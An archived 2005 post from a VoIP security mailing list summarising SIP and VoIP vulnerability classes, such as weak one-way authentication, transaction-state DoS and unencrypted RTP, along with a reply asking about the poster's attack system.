[VOIPSEC] VoIP vulnerabilities summarization

Christophe christophe.benejean at u4eatech.com
Tue Dec 13 05:00:51 CST 2005 

Sukery,

Thanks for this lovely summarization...You're spoke about an attack
system, what is this attack system and where can we find it?

Thanks,

Christophe

-----Original Message-----
From: Voipsec-bounces at voipsa.org [mailto:Voipsec-bounces at voipsa.org] On
Behalf Of sukery
Sent: mardi 13 décembre 2005 11:00
To: Voipsec at voipsa.org
Subject: [VOIPSEC] VoIP vulnerabilities summarization



here is the summarization of voip vulnerabilities, and we are proud to
say that we have realized an attack system to validate almost all the
vulnerabilities, and I think point 2 and point 3 is  due to the
imperfection of SIP protocol itself

1.traditional IP network is insecure,its data stream is open to the
public,VoIP, which is based on IP network certainly inherits this
insecurity,this situation brings lots of attacks , such as Man in middle
attak,call termination, sip password violent crack ,etc.

2.SIP reuses  authentication mechanism from HTTP protocol ,in fact Http
authentication is totally imperfect when applied to SIP protocol,for
that it is a single-direction authentication, which means that only the
server authenticates the endpoints,the endpoints do not authenticate the
server,this situation makes it easy to deceive endpoints because they do
not authenticate any entity in the network. Pseudo call (call someone
with a false user id) ,server impersontation are dangerous attacks due
to this vulnerability

3. SIP communication is based on message transaction, however sip
transaction mechanism is quite complicated.for example, when  a stateful
proxy server receives a sip request message, it firstly computes the
transaction ID for this message,if the transaction ID is not existed
before, this request message is regarded as  a new message, the server
will do a lot things for this new message:  save this message, create a
finite statemachine for this message, construct a provisional response
message and send it back, save this response message,update the finite
statemachine, decide the next hop of this request message basing on the
complex routing rules,transfer the request message, create one or more
client transactions for the request message ...these steps surely
consume lots of CPU and memory resources.  as a result,the server is
susceptible to DoS Attacks when a hacker continually sends large
quantities of SIP request messages with different Call-ID

4.Un-encrypted media stream such as RTP data is easy to be wiretapped

5.almost all VoIP software has some code flows, in this case,even a
malicious packet may bring down the server, we call this packet
exception packet, in fact we have found exception packets againtst both
sip servers and h.323 servers 

6.voip endpoints are much more intellectualized than traditional PSTN
terminals,however,when this capability is abused,a lot of  malicious
network attacks appear:
     disturbance call
	 call leaflet 
     voice broadcast
     and more



>Chris
>
>I'm pretty heavily involved in SIP standards development, and have been

>for some time.  I talk regularly with the kind of folks that I think 
>would know if their stuff had been "hit".  I know about plenty of 
>attacks on the underlying infrastructure, including the platform 
>attacks.  I have NEVER heard even a whisper of an actual attack on VoIP

>equipment that used exploits specifically related to SIP (which I don't

>think is substantially better or worse than other VoIP protocols).
>_______________________________________________
>Voipsec mailing list
>Voipsec at voipsa.org
>http://voipsa.org/mailman/listinfo/voipsec_voipsa.org

More information about the Voipsec mailing list